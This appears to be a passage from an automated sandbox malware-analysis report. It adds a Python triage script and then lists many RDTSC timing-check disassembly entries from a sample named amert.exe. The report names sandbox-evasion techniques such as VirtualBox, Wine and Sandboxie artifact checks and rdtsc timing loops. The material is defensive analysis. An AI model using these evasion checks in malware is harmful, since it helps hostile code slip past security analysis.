Source: toolspub1.exe, 00000031.00000002.2228738591.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
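Added example, not part of the Joe Sandbox report and not code from any of the malware families or tools it names: a Python triage helper that parses entries in the "Source: <process> <event>: <detail>" form used in this section, drops the "Jump to behavior" link text the HTML report appends to some of them, groups each process's entries under technique labels (the labels, the marker lists, and the constructed sample entries embedded in the script are this example's own choices, copied from lines in this section), and, for the RDTSC instruction interceptor entries that follow, turns each pair of addresses into the byte gap between the two rdtsc reads and the number of instructions timed between them.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied in the format of this report's
# "Malware Analysis System Evasion" section (one RDTSC entry is straight-line, one is not).
SAMPLE_ENTRIES = r"""
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\1CMweaqlKp.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7E22AF second address: 7E22B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7E22B3 second address: 7E22CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
"""

EVENT_TYPES = (
    "Key enumerated", "Stalling execution", "WMI Queries", "System information queried",
    "File opened", "Binary or memory string", "RDTSC instruction interceptor",
)
ENTRY_RE = re.compile(
    r"^Source: (?P<source>.+?) (?P<event>" + "|".join(re.escape(e) for e in EVENT_TYPES)
    + r"): (?P<detail>.*)$"
)
RDTSC_RE = re.compile(
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+)"
    r" instructions: (?P<listing>.*)"
)
LINK_RESIDUE = " Jump to behavior"  # link text the HTML report appends to some entries

# Technique labels and marker lists are this script's own grouping (an assumption),
# not labels taken from the report.
VM_ARTIFACT_MARKERS = ("VBOX__", r"Software\Wine", "SBIEDLL.DLL", "WINE_GET_UNIX_FILE_NAME", "ASWHOOK")
HARDWARE_MARKERS = (r"Enum\SCSI", "Win32_DiskDrive", "Win32_VideoController")


def parse_entry(line):
    """Split one 'Source: <process> <event>: <detail>' line; None for any other line."""
    line = line.strip()
    if line.endswith(LINK_RESIDUE):
        line = line[: -len(LINK_RESIDUE)]
    m = ENTRY_RE.match(line)
    return m.groupdict() if m else None


def process_name(source):
    """'C:\\...\\amert.exe' -> 'amert.exe'; 'file300un.exe, <dump id>' -> 'file300un.exe'."""
    return source.split(",", 1)[0].rsplit("\\", 1)[-1]


def classify(event, detail):
    if event in ("RDTSC instruction interceptor", "Stalling execution"):
        return "time-based-evasion"        # rdtsc deltas / Sleep to outlast the sandbox
    if event == "System information queried" and "FirmwareTableInformation" in detail:
        return "firmware-table-query"      # SMBIOS/ACPI tables carry the hypervisor's name
    if any(m in detail for m in HARDWARE_MARKERS):
        return "hardware-enumeration"      # disk / GPU identifiers via registry or WMI
    if any(m in detail for m in VM_ARTIFACT_MARKERS):
        return "vm-artifact-check"         # VirtualBox, Wine, Sandboxie, AV-hook artifacts
    return "unclassified"


def parse_rdtsc(detail):
    """Decode an RDTSC interceptor entry into the timing window it measures."""
    m = RDTSC_RE.match(detail)
    if not m:
        return None
    first, second, listing = int(m["first"], 16), int(m["second"], 16), m["listing"]
    # Each listed instruction is prefixed with its byte offset from the first rdtsc.
    offsets = [int(o, 16) for o in re.findall(r"\b0x([0-9A-Fa-f]{8})\b", listing)]
    mnemonics = re.findall(r"0x[0-9A-Fa-f]{8} ([a-z]+)", listing)
    gap = second - first
    return {
        "first": first,
        "second": second,
        "gap": gap,                          # bytes between the two rdtsc instructions
        "instructions": len(offsets),        # instructions executed, both rdtsc included
        "window": max(len(offsets) - 2, 0),  # instructions timed between the two reads
        "rdtsc_count": mnemonics.count("rdtsc"),
        # Straight-line path: the last listed offset equals the address gap. Otherwise a
        # jump inside the window skipped bytes that were never executed.
        "linear": bool(offsets) and offsets[-1] == gap,
    }


def summarize(report_text):
    """Map each process to the sorted list of technique labels it exhibits."""
    techniques = defaultdict(set)
    for line in report_text.splitlines():
        entry = parse_entry(line)
        if entry:
            techniques[process_name(entry["source"])].add(classify(entry["event"], entry["detail"]))
    return {proc: sorted(t) for proc, t in techniques.items()}


def rdtsc_windows(report_text):
    """All RDTSC interceptor entries, decoded, in report order."""
    return [parse_rdtsc(e["detail"]) for e in map(parse_entry, report_text.splitlines())
            if e and e["event"] == "RDTSC instruction interceptor"]


if __name__ == "__main__":
    for proc, techs in summarize(SAMPLE_ENTRIES).items():
        print(f"{proc:18} {', '.join(techs)}")
    for w in rdtsc_windows(SAMPLE_ENTRIES):
        print(f"rdtsc {w['first']:X}->{w['second']:X}: gap {w['gap']} bytes, "
              f"{w['window']} instructions timed, linear={w['linear']}")
```

Run it over the full section instead of the embedded sample and the per-process table shows which dropped component checks what; the `linear` flag separates clean rdtsc pairs (a few pops between the reads) from windows where the listing jumps over bytes that never execute, which is why the address gap can be far larger than the handful of instructions the interceptor actually saw.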
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7E22AF second address: 7E22B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7E22B3 second address: 7E22CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F59D3 second address: 7F59D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F59D9 second address: 7F59E3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5C99 second address: 7F5CA5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D7471B5DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CA5 second address: 7F5CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jng 00007F0D755569B6h 0x00000013 popad 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CC1 second address: 7F5CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CC7 second address: 7F5CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CCD second address: 7F5CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F600E second address: 7F602E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569C9h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F602E second address: 7F604A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F604A second address: 7F6050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F88DE second address: 7F88FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F0D7471B5DEh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F88FD second address: 7F8904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8948 second address: 7F8984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0D7471B5E2h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F0D7471B5D6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8984 second address: 7F8A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0D755569BCh 0x0000000f jl 00007F0D755569B6h 0x00000015 popad 0x00000016 nop 0x00000017 mov dword ptr [ebp+122D1BDFh], edi 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D2D87h], ecx 0x00000025 or dl, FFFFFFE3h 0x00000028 push 4B0C8EAEh 0x0000002d jp 00007F0D755569CAh 0x00000033 push ebx 0x00000034 jmp 00007F0D755569C2h 0x00000039 pop ebx 0x0000003a xor dword ptr [esp], 4B0C8E2Eh 0x00000041 and edx, dword ptr [ebp+122D39C7h] 0x00000047 push 00000003h 0x00000049 mov edx, 0FCA41BAh 0x0000004e push 00000000h 0x00000050 mov ecx, dword ptr [ebp+122D3A87h] 0x00000056 push 00000003h 0x00000058 call 00007F0D755569C0h 0x0000005d mov dword ptr [ebp+122D1847h], esi 0x00000063 pop edx 0x00000064 mov dword ptr [ebp+122D3105h], eax 0x0000006a call 00007F0D755569B9h 0x0000006f push eax 0x00000070 push edx 0x00000071 jnc 00007F0D755569BCh 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8A29 second address: 7F8ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F0D7471B5DCh 0x0000001b mov eax, dword ptr [eax] 0x0000001d jng 00007F0D7471B5DCh 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edi 0x0000002a pop edi 0x0000002b pop eax 0x0000002c pop ecx 0x0000002d pop eax 0x0000002e call 00007F0D7471B5DDh 0x00000033 jo 00007F0D7471B5DCh 0x00000039 mov dword ptr [ebp+122D3168h], ecx 0x0000003f pop esi 0x00000040 add dword ptr [ebp+122D2F35h], ecx 0x00000046 lea ebx, dword ptr [ebp+1244D822h] 0x0000004c mov edx, 576335DFh 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0D7471B5E9h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8B4B second address: 7F8B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569C4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8B64 second address: 7F8BC8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D7471B5ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F0D7471B5ECh 0x00000011 nop 0x00000012 sbb edx, 661256BFh 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+122D30A3h], esi 0x00000020 call 00007F0D7471B5D9h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0D7471B5DDh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8BC8 second address: 7F8C04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0D755569BAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0D755569BCh 0x00000013 pop edx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0D755569C7h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8C04 second address: 7F8C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7471B5E9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8C21 second address: 7F8C30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8D21 second address: 7F8D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8D25 second address: 7F8D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8D2B second address: 7F8D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8DD5 second address: 7F8DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8DDC second address: 7F8ED5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D7471B5E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F0D7471B5DBh 0x00000010 nop 0x00000011 mov edx, esi 0x00000013 push 00000000h 0x00000015 mov edx, dword ptr [ebp+122D39E7h] 0x0000001b call 00007F0D7471B5D9h 0x00000020 jmp 00007F0D7471B5DDh 0x00000025 push eax 0x00000026 push eax 0x00000027 jmp 00007F0D7471B5DEh 0x0000002c pop eax 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 pushad 0x00000032 jmp 00007F0D7471B5E2h 0x00000037 jns 00007F0D7471B5DCh 0x0000003d popad 0x0000003e mov eax, dword ptr [eax] 0x00000040 jg 00007F0D7471B5F0h 0x00000046 pushad 0x00000047 jmp 00007F0D7471B5E6h 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 jnl 00007F0D7471B5E0h 0x00000059 pop eax 0x0000005a mov cx, si 0x0000005d push 00000003h 0x0000005f ja 00007F0D7471B5DCh 0x00000065 mov dword ptr [ebp+122D32CFh], ebx 0x0000006b push 00000000h 0x0000006d mov edi, dword ptr [ebp+122D39D7h] 0x00000073 jmp 00007F0D7471B5DAh 0x00000078 push 00000003h 0x0000007a mov ecx, edx 0x0000007c call 00007F0D7471B5D9h 0x00000081 jng 00007F0D7471B5E4h 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8ED5 second address: 7F8EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8EDA second address: 7F8F26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 jmp 00007F0D7471B5E8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8F26 second address: 7F8F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b adc cx, 0876h 0x00000010 lea ebx, dword ptr [ebp+1244D836h] 0x00000016 call 00007F0D755569C2h 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 80B79D second address: 80B7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 80B7A3 second address: 80B7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 80B7AB second address: 80B7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F0D7471B5EBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 81793E second address: 817944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817944 second address: 81794A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 81794A second address: 817967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D755569C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817BD8 second address: 817BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817BDC second address: 817C0D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D755569C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0D755569BEh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C0D second address: 817C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C11 second address: 817C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0D755569B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C23 second address: 817C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C29 second address: 817C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817EA3 second address: 817EAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8183E0 second address: 8183F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8183F5 second address: 818407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 je 00007F0D7471B5D6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818407 second address: 81843C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D755569C9h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8185BD second address: 8185CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D7471B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F0D7471B5DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818723 second address: 818769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F0D755569C6h 0x0000000b jmp 00007F0D755569C1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F0D755569C6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B26 second address: 818B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B2A second address: 818B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnl 00007F0D755569B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F0D755569C2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jc 00007F0D755569B6h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B5C second address: 818B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B60 second address: 818B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0D755569B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0D755569C3h 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F0D755569C0h 0x0000001b pop ecx 0x0000001c push eax 0x0000001d je 00007F0D755569B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 81945F second address: 819466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82026E second address: 820273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 820273 second address: 820287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D7471B5DFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82744A second address: 82745C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82777C second address: 82779C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0D7471B5DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D7471B5DAh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82779C second address: 8277A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8277A1 second address: 8277A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
